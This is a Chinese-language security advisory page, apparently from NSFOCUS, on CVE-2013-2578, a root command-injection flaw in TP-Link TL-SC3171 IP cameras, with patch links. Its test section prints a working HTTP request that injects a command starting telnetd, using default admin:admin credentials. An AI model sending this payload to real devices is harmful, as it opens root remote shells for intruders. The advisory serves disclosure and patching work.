安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
TP-Link TL-SC3171网络摄像机多个远程命令注入漏洞(CVE-2013-2578)
发布日期:
2013-07-30
更新日期:
2013-08-01
受影响系统:
TP-LINK TL-SC3171
描述:
BUGTRAQ ID:
61529
CVE(CAN) ID:
CVE-2013-2578
TP-Link TL-SC3171是支持夜视功能的网络摄像机。
TP-Link TL-SC3171固件版本LM.1.6.18P12_sign5中,文件/cgi-bin/admin/servetest的几个参数存在OS命令注入漏洞,可被经过身份验证的用户以root权限执行任意命令。
<*来源:Flavio de Cristofaro
Andres Blanco
链接:
http://seclists.org/fulldisclosure/2013/Jul/272
http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET
/cgi-bin/admin/servetest?cmd=smtp&ServerName=www.example.com;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q
HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: <a href="
http://www.example1.com/progress.htm">http://www.example1.com/progress.htm</a>
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Host: www.example1.com
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2
建议:
厂商补丁:
TP-LINK
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.tp-link.com/en/products/details/?model=TL-SC3171
beta测试版:
https://www.wetransfer.com/downloads/abd4bc89fabd7fc65d5ef553d0ebf4e620130726105324/09f57f
浏览次数:
3465
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客